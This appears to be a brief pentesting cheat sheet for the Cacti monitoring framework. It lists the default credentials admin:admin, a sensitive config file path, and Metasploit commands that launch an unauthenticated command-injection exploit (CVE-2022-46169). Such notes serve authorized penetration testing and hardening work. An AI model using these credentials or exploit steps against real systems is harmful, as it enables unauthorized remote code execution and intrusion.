Cacti Pentesting

Cacti is a web-based network monitoring, performance, fault and configuration management framework designed as a front-end application.

Default Credentials

admin:admin

Common Directories

/include/config.php

Remote Code Execution (RCE) CVE-2022-46169

Reference: https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/

msfconsole
msf> use exploit/linux/http/cacti_unauthenticated_cmd_injection
msf> (set options...)
msf> run

Also we can refer to Exploit DB.

References

• Pentest Tools